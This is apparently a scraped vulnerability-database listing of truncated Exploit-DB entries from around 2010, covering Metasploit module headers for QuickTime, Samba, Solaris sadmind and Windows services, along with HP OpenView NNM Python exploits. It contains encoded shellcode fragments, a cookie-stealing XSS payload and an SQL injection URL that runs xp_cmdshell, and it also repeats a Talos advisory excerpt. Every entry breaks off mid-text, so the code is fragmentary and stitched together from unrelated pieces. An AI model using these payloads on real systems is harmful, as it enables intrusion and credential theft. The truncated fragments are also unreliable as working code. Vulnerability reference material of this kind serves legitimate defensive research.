CVE-2003-0050 QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
---
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
'Description' => %q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allow arbitrary commands to be executed as root.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'OSVDB', '1056
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution
exploitdb·2010-07-02·CVSS 10.0
CVE-2010-1555 [CRITICAL] HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution
---
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1555
# Code :
#!/usr/bin/python
import struct
import socket
import httplib
import urllib
eh =(
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a"
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48"
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51"
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
"\x4a\x4a\x49\x42\x46\x4d\x51\x49\x5a\x4b\x4f\x44\x4f\x50"
"\x42\x46\x32\x42\x4a\x43\x32\x50\x58\x48\x4d\x46\x4e\x47"
"\x4c\x43\x35\x50
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
exploitdb·2010-07-02·CVSS 10.0
CVE-2010-1553 [CRITICAL] HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
---
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1553
# Code :
#!/usr/bin/python
import struct
import socket
import httplib
import urllib
# calc.exe Windows Execute Command
sc2 = (
"\x89\xe7\xdb\xc4\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x47\x70\x43\x30\x45\x50\x51\x70\x4f\x79"
"\x4d\x35\x50\x31\x4b\x
Exploit-DB
Solaris Sadmind - Command Execution (Metasploit)
exploitdb·2010-06-22
CVE-2003-0722 Solaris Sadmind - Command Execution (Metasploit)
Solaris Sadmind - Command Execution (Metasploit)
---
##
# $Id: sadmind_exec.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Solaris sadmind Command Execution',
'Description' => %q{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
Vulnerable systems include solaris 2.7, 8, and 9
},
'Author' => [ 'vlad902 ', 'hdm', 'cazz' ],
'License' => MSF_LICENSE,
'Version' =>
Exploit-DB
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-21
CVE-2003-0201 Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Mac OS X PPC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm', 'jduck' ],
'Version' => '$Revision: 9571 $',
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294'
Exploit-DB
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-21
CVE-2003-0201 Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Solaris SPARC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on Solaris SPARC systems that do not
have the noexec stack option set. Big thanks to MC and
valsmith for resolving a problem with the beta version of
this module.
},
'A
Exploit-DB
Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2003-0220 Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)
Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)
---
##
# $Id: kerio_auth.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Kerio Personal Firewall
administration authentication process. This module has only been tested
against Kerio Personal Firewall 2 (2.1.4).
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9525 $',
'References' =>
[
Exploit-DB
Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting
exploitdb·2010-05-10
CVE-2010-2003 Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting
Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/40045/info
Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Advanced Poll 2.08 is vulnerable; other versions may also be affected.
alert(document.cookie);">
document.main.submit();
Exploit-DB
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
exploitdb·2010-05-09
CVE-2003-0812 Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
---
##
# $Id: ms03_049_netapi.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Workstation Service NetAddAlternateComputerName Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName
function using the Workstation service in Windows XP.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[
Exploit-DB
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2003-0264 Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
---
##
# $Id: seattlelab_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Seattle Lab Mail 5.5 POP3 Buffer Overflow',
'Description' => %q{
There exists an unauthenticated buffer overflow vulnerability
in the POP3 server of Seattle Lab Mail 5.5 when sending a password
with excessive length.
Successful exploitation should not crash either the
service or the server; however, after initial use the
port cannot be reused for s
Exploit-DB
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
exploitdb·2010-04-22
CVE-2010-1734 Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
---
/*
Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability
Effect : Microsoft Windows 2000/XP/2003 full patch
Author:MJ0011
Published: 2010-04-22
Vulnerability Details:
Win32k.sys in DispatchMessage when the last call to xxxDefWindowProc, this function in dealing with some
Message, will call gapfnScSendMessage this function table function to process,
which under the deal 2000/xp/2003 0x4c No. message, there will be SfnINSTRING function called this function when the lParam is not empty,
direct that the lParam is a memory pointer, and pull data directly from the address
despite the use of the function of the SEH, but as long as the kernel address transmission
Exploit-DB
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
exploitdb·2010-04-22
CVE-2010-1894 Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
---
/*
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability
Effect : Microsoft Windows 2000/XP/2003 full patch
Author:MJ0011
Published: 2010-04-22
Vulnerability Details:
Win32k.sys in DispatchMessage when the last call to xxxDefWindowProc, this function in dealing with some
Message, will call gapfnScSendMessage this function table function to process, which under the deal 2000/xp/2003
0x4c No. message, there will be a function called SfnLOGONNOTIFY, this function again when the wParam == 4/13/12
When the data directly from the lParam inside out, despite the use of the function of the SEH, but as long as the kernel passes the wrong address, will still le
Exploit-DB
IISProtect 2.1/2.2 - Web Administration Interface SQL Injection
exploitdb·2003-05-23
CVE-2003-0377 IISProtect 2.1/2.2 - Web Administration Interface SQL Injection
IISProtect 2.1/2.2 - Web Administration Interface SQL Injection
---
source: https://www.securityfocus.com/bid/7675/info
The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.
Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences.
http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--
This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.
Talos
Increase in attacks on CVE-2010-1885
blogs_talos·2010-07-07·CVSS 9.3
CVE-2010-1885 [CRITICAL] Increase in attacks on CVE-2010-1885
Microsoft is warning that there has been an increase of attacks against a zero-day vulnerability in Microsoft Help and Support Center. The vulnerability is due to an error when using invalid hexadecimal characters in the search topic parameter of a URI. It can be used to bypass restrictions normally imposed by a command-line argument to load arbitrary help documents. Proof-of-concept code has been available since at least mid-June and has been proven to work with Windows XP, and Windows Server 2003, other versions may also be affected. While a patch is still not available, you should plan on patching as soon as one is. In the meantime, be careful or better, unregister the HCP protocol (manually, or by using this tool provided by Microsoft). However, doing so will break all local links that
Talos
Increase in attacks on CVE-2010-1885
blogs_talos·2010-07-07·CVSS 9.3
CVE-2010-1885 [CRITICAL] Increase in attacks on CVE-2010-1885
## Increase in attacks on CVE-2010-1885
Microsoft is warning that there has been an increase of attacks against a zero-day vulnerability in Microsoft Help and Support Center. The vulnerability is due to an error when using invalid hexadecimal characters in the search topic parameter of a URI. It can be used to bypass restrictions normally imposed by a command-line argument to load arbitrary help documents. Proof-of-concept code has been available since at least mid-June and has been proven to work with Windows XP, and Windows Server 2003, other versions may also be affected. While a patch is still not available, you should plan on patching as soon as one is. In the meantime, be careful or better, unregister the HCP protocol (manually, or by using this tool provided by Microsoft). However,
http://osvdb.org/64524http://packetstormsecurity.org/1005-exploits/advancedpoll208-xss.txthttp://secunia.com/advisories/39768http://www.htbridge.ch/advisory/xss_vulnerability_in_advanced_poll.htmlhttp://www.securityfocus.com/archive/1/511210/100/0/threadedhttp://www.securityfocus.com/bid/40045https://exchange.xforce.ibmcloud.com/vulnerabilities/58503http://osvdb.org/64524http://packetstormsecurity.org/1005-exploits/advancedpoll208-xss.txthttp://secunia.com/advisories/39768http://www.htbridge.ch/advisory/xss_vulnerability_in_advanced_poll.htmlhttp://www.securityfocus.com/archive/1/511210/100/0/threadedhttp://www.securityfocus.com/bid/40045https://exchange.xforce.ibmcloud.com/vulnerabilities/58503
2010-05-20
Published